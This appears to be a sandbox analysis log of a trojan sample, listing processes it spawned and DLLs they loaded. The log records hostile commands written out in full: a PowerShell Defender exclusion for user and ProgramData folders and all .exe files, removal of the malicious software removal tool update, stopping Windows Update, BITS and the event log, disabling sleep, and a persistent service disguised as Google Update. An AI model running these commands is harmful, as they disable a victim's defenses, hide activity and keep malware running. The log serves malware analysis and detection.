Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\GoogleUP\Chrome\Updater.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\GoogleUP\Chrome\Updater.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\GoogleUP\Chrome\Updater.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\GoogleUP\Chrome\Updater.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\ProgramData\GoogleUP\Chrome\Updater.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
Source: C:\Windows\System32\powercfg.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\GoogleUP\Chrome\Updater.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\Windows\System32\powercfg.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\GoogleUP\Chrome\Updater.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
Source: C:\Windows\System32\powercfg.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\GoogleUP\Chrome\Updater.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe
Source: C:\Windows\System32\powercfg.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\GoogleUP\Chrome\Updater.exe	Process created: C:\Windows\explorer.exe explorer.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineK"	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineK" binpath= "C:\ProgramData\GoogleUP\Chrome\Updater.exe" start= "auto"	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineK"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart	Jump to behavior
Source: C:\ProgramData\GoogleUP\Chrome\Updater.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force	Jump to behavior
Source: C:\ProgramData\GoogleUP\Chrome\Updater.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart	Jump to behavior
Source: C:\ProgramData\GoogleUP\Chrome\Updater.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc	Jump to behavior
Source: C:\ProgramData\GoogleUP\Chrome\Updater.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc	Jump to behavior
Source: C:\ProgramData\GoogleUP\Chrome\Updater.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv	Jump to behavior
Source: C:\ProgramData\GoogleUP\Chrome\Updater.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits	Jump to behavior
Source: C:\ProgramData\GoogleUP\Chrome\Updater.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc	Jump to behavior
Source: C:\ProgramData\GoogleUP\Chrome\Updater.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0	Jump to behavior
Source: C:\ProgramData\GoogleUP\Chrome\Updater.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0	Jump to behavior
Source: C:\ProgramData\GoogleUP\Chrome\Updater.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0	Jump to behavior
Source: C:\ProgramData\GoogleUP\Chrome\Updater.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0	Jump to behavior
Source: C:\ProgramData\GoogleUP\Chrome\Updater.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe	Jump to behavior
Source: C:\ProgramData\GoogleUP\Chrome\Updater.exe	Process created: C:\Windows\explorer.exe explorer.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wusa.exe	Section loaded: dpx.dll	Jump to behavior
Source: C:\Windows\System32\wusa.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Windows\System32\wusa.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wusa.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wusa.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\powercfg.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\powercfg.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\powercfg.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\powercfg.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\ProgramData\GoogleUP\Chrome\Updater.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wusa.exe	Section loaded: dpx.dll	Jump to behavior
Source: C:\Windows\System32\wusa.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Windows\System32\wusa.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wusa.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\powercfg.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\powercfg.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\powercfg.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\powercfg.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
